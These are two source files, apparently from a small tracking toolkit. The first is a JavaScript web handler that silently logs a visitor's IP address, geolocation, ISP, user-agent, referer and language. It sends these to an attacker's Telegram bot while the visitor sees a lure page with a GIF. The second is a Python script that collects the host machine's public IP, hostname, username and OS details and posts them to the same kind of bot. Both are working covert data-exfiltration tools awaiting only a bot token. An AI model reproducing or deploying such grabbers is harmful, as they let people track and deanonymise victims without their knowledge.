File: Ip n sys/web/TELEGRAM/rayzer.js
// /web/TELEGRAM/rayzer.js

const BOT_TOKEN = "PUT_BOT_TOKEN_HERE";
const CHAT_ID = "PUT_CHAT_ID_HERE";
const GIF_URL = "https://media.tenor.com/Po3vHMaLLqgAAAAC/ronaldo-osuruk.gif";

export default async function handler(req, res) {
  const ip = (req.headers["x-forwarded-for"] || req.connection.remoteAddress || "").split(",")[0].trim();
  const userAgent = req.headers["user-agent"] || "None";
  const referer = req.headers["referer"] || "None";
  const lang = req.headers["accept-language"] || "None";

  let geo = {};
  try {
    const r = await fetch(`http://ip-api.com/json/${ip}?fields=status,country,regionName,city,lat,lon,isp,org,query`);
    geo = await r.json();
  } catch {
    geo = { country: "?", city: "?", regionName: "?", lat: "?", lon: "?", isp: "?" };
  }

  const message = `🔍 *New Log*
  
*IP:* \`${ip}\`
*Location:* ${geo.city}, ${geo.regionName}, ${geo.country}
*Cords:* ${geo.lat}, ${geo.lon}
*ISP:* ${geo.isp || "Unknown"}
*User-Agent:* \`${userAgent}\`
*Referer:* ${referer}
*Language:* ${lang}

📅 ${new Date().toISOString()}`;

  const url = `https://api.telegram.org/bot${BOT_TOKEN}/sendMessage`;

  fetch(url, {
    method: "POST",
    headers: { "Content-Type": "application/json" },
    body: JSON.stringify({
      chat_id: CHAT_ID,
      text: message,
      parse_mode: "Markdown"
    })
  }).catch(() => { });

  res.setHeader("Content-Type", "text/html");
  res.status(200).send(`
    <!DOCTYPE html>
    <html>
      <head><title>WATCH IT</title><meta name="viewport" content="width=device-width, initial-scale=1.0"/></head>
      <body style="margin:0;background:black;display:flex;justify-content:center;align-items:center;height:100vh;">
        <img src="${GIF_URL}" style="max-width:100%;height:auto;" />
      </body>
    </html>
  `);
}

File: Ip n sys/execution/TELEGRAM/rayzer.py
import requests
import socket
import os
import getpass
import platform
from datetime import datetime

BOT_TOKEN = "PUT_BOT_TOKEN_HERE"
CHAT_ID = "PUT_CHAT_ID_HERE"

def get_public_ip():
    try:
        return requests.get('https://api.ipify.org').text
    except:
        return "Unknown"

def main():
    if BOT_TOKEN == "PUT_BOT_TOKEN_HERE" or CHAT_ID == "PUT_CHAT_ID_HERE":
        print("Error: Telegram credentials not set!")
        return

    ip = get_public_ip()
    hostname = socket.gethostname()
    username = getpass.getuser()
    os_info = platform.system() + " " + platform.release()
    arch = platform.machine()
    
    message = (
        "🔍 **New Log**\n\n"
        f"**Public IP:** `{ip}`\n"
        f"**Hostname:** `{hostname}`\n"
        f"**Username:** `{username}`\n"
        f"**OS Info:** `{os_info}`\n"
        f"**Arch:** `{arch}`\n\n"
        "📅 " + datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S UTC')
    )
    
    url = f"https://api.telegram.org/bot{BOT_TOKEN}/sendMessage"
    payload = {
        "chat_id": CHAT_ID,
        "text": message,
        "parse_mode": "Markdown"
    }
    
    try:
        requests.post(url, json=payload)
    except Exception as e:
        print(f"Error: {e}")

if __name__ == "__main__":
    main()
